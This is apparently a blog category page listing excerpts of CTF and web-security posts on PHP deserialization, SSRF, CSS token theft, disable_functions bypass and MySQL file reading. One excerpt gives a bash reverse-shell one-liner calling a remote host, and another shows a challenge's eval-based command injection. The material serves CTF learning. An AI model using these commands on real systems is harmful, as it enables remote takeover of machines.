CTF
文章平均质量分 92
BerL1n
网安web
展开
-
一道构造pop链的反序列化题
最近在回顾php反序列化知识时遇到了一道题,感觉知识点挺多的,可以全面复习下反序列化。原创 2022-10-01 17:01:26 · 710 阅读 · 0 评论 -
EIS高校运维赛WP
WEBezbypasshttp://111.186.57.61:10101/<?phpif(isset($_GET['src'])){ highlight_file(__FILE__);}eval($_GET['cmd']);很明显eval命令执行,但是不可能这么容易,看了下phpinfo,果然ban了很多函数disable_functions : pcntl...原创 2021-01-27 12:37:09 · 661 阅读 · 1 评论 -
Linux下几种常见的反弹shell的方式
time:2019-04-11 21:07最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。1.bash反弹shell个人感觉bash反弹是最简单、也是最常见的一种。bash -i >& /dev/tcp/192.168.20.151/8080 0>&1bash一句话命令详解以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。其实以上bash反弹一句完整的解读过程就是:bash产生了一个交互环境与本地主机主动发起与目标原创 2021-01-27 12:35:14 · 1801 阅读 · 1 评论 -
php反序列化拓展攻击详解
2019-11-11 16:51文章首发于先知社区:https://xz.aliyun.com/t/6699前言继上篇对thinkphp5版本反序列化pop链详细分析后,对tp的反序列化漏洞有了初步了解,但是其实无论挖掘的pop链有多么的完美,最终还是避免不了要有关键的触发点,否则将一无是处,比如常见的就是反序列化函数 unserialize() ,绝大多数都是靠unserialize函数,反序列化对象触发漏洞。但是在tp框架或者其他框架以及后期开发越来越安全的情况下我们很难再找到这样的触发点。最近也原创 2021-01-27 12:29:48 · 859 阅读 · 0 评论 -
php反序列化漏洞
2019-05-12 21:50php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基础的php知识。类和变量是非常容易理解的php概念。这里先来了解一下什么是php序列化与反序列化?序列化:函数 : serialize()把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。反序列化:函数: unserialize()恢复原先被序列化原创 2021-01-27 12:28:47 · 275 阅读 · 0 评论 -
PHPsession反序列化漏洞
111原创 2021-01-27 12:26:11 · 650 阅读 · 0 评论 -
CSS注入窃取token
关于css注入是头一次看到,这里参考各师傅学习一下。窃取input标签中的token假设我们有一个php页面<?php$token1 = md5($_SERVER['HTTP_USER_AGENT']);$token2 = md5($token1);?><!doctype html><meta charset=utf-8><input ty...原创 2021-01-27 12:25:14 · 981 阅读 · 0 评论 -
2019上海嘉韦思杯web&crypto
time: 2019-04-11 21:02分类:ctf文章首发于先知社区:2019上海嘉韦思杯web&crypto这次的比赛没来的及做,看了几道web就没做,难度一般,不过听说服务器很不稳定过程很坎坷,应该算是新生赛,有很多赛题之前做过类似的。服务器第二天就关闭了,时间很短暂,结束后尽快的做了一波。WEBweb1题目地址:47.103.43.235:81/quest/web/a/index.php根据题目是道注入题,and 1=1可正常回显,应该就是一道普通的字符注入题有4原创 2020-12-29 10:18:49 · 178 阅读 · 0 评论 -
2019全国信息安全大赛
time: 2019-04-27 11:36web1查看源码然后文件包含,读取hint.php获取到的源码:http://b61818746d3d4bd9840914f5b107e98298d37d27278746d1.changame.ichunqiu.com/index.php?file=php://filter/read=convert.base64-encode/resource=hint.php经过base64解码,得到hint.php源码:hint.php<?php原创 2020-12-29 10:15:30 · 1059 阅读 · 0 评论 -
2019DDctfWP
Time: 2019-04-27 11:46本来想挺进前三十呢,结果大佬们都太强了,无奈。。web滴~打开界面就一张图片。注意urlhttp://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09参数这经过一次base16,两次base64,加密,解密后也就是flag.jpg,因此可尝试读取index.php,经过加密后为TmprMlJUWTBOalUzT0RKRk56QTJPRGN3访问源代码base64解原创 2020-12-29 10:11:52 · 538 阅读 · 0 评论 -
2018中原工网络安全校赛
time: 2019-04-11 20:31分类:ctf趁着周日没事,去瞅一波别人家的校赛。。。emmm,WEBweb1签到打开后是他们团队的一个宣传主页,不能右键,以为像往常的题一样,看下源代码就行了,结果啥也没有然后瞅了一眼响应头,发现问题了打开txt后是PHP代码<?php$flag = "***";if (isset($_GET['repo'])) { if (strcmp($_GET['repo'], $flag) == 0) die('.原创 2020-12-29 10:05:03 · 252 阅读 · 0 评论 -
记一次sql注入题目
前言前几天在做上海赛中碰到一道sql注入题,很简单的一道题,过滤的也都fuzz出来了,绕过方法也找到了,还是没做出来,因为不能有单引号,一出现单引号就404,fuzz到其他敏感字都是提示禁用的,就是单引号会404,赛后看payload也是有单引号的,emmm…可能还是自己payload没写好吧。。原谅注入学的最菜的我,这里小记一下吧。例题通过一道题目记下思路和过程。题目输入内容,然后可以...原创 2019-11-25 16:55:39 · 354 阅读 · 0 评论 -
SSRF利用 Gopher 协议拓展攻击面
1 概述Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。gopher:gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...原创 2019-11-25 16:50:55 · 9878 阅读 · 0 评论 -
thinkphp5.1.x~5.2.x版本反序列化链挖掘分析
前言之前看到关于thinkphp5反序列化链的分析以及不久前做的各大ctf赛题中都考到了反序列化链挖掘并利用的题目,之前未进行分析,这里参考各位师傅的文章进行分析一下。。5.1.x版本分析thinkphp5.1版本反序列化漏洞在今年七月份爆出。环境thinkphp 5.1php 7.2漏洞挖掘思路挖掘反序列化漏洞过程中,很多时候都是利用php中的魔术方法触发反序列化漏洞。但如果漏洞...原创 2019-11-11 16:47:22 · 1554 阅读 · 0 评论 -
PHP绕过disable_function限制
前言之前对php中的这个disable_function没什么了解,不过通过国赛决赛中的一道题引起了注意,因为在对基本上所有的shell命令禁用之后必须想办法突破disable_function才行,这里学习几种突破disable_function的方法。LD_PRELOAD环境变量突破LD_PRELOAD是Linux系统的下一个有趣的环境变量:“它允许你定义在程序运行前优先加载的动态链接库...原创 2019-09-24 15:33:01 · 4935 阅读 · 2 评论 -
mysql任意文件读取漏洞学习
前言最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile '/etc/passwd' into table proc;,从而可以导致mys...原创 2019-09-13 13:54:46 · 3724 阅读 · 5 评论 -
moctf部分web-wp
没时间解释了点进题目发现是index2.php,想到302跳转,burp查看会出现提示访问uploadsomething.php页面写入文件会显示出文件地址,但是当去访问它的时候,会显示Too slow!猜测服务器会自动删除文件,但是文件在上传至服务器和被删除这中间有微小的时间间隔。题目考察的应该是条件竞争,一边利用burp不断发包,另一边不断去读取文件地址。import reques...原创 2019-07-22 19:06:35 · 500 阅读 · 0 评论 -
一道ctf题关于php反序列化字符逃逸
2019强网杯easy_sql这题知识点堆叠注入;以前还未遇到过这是过滤掉的内容,因此常见的注入方式我们是不能再使用了。然后提交试试。发现似乎是直接把返回的原始数据给返回了。3.然后来测试一下有没有注入,似乎是有的。/?inject=1%27or+%271%27%3D%271 /?inject=1’ or ‘1’='14.来检查一下过滤情况,过滤函数如下。过滤了 select,u...原创 2019-07-18 17:21:23 · 2382 阅读 · 0 评论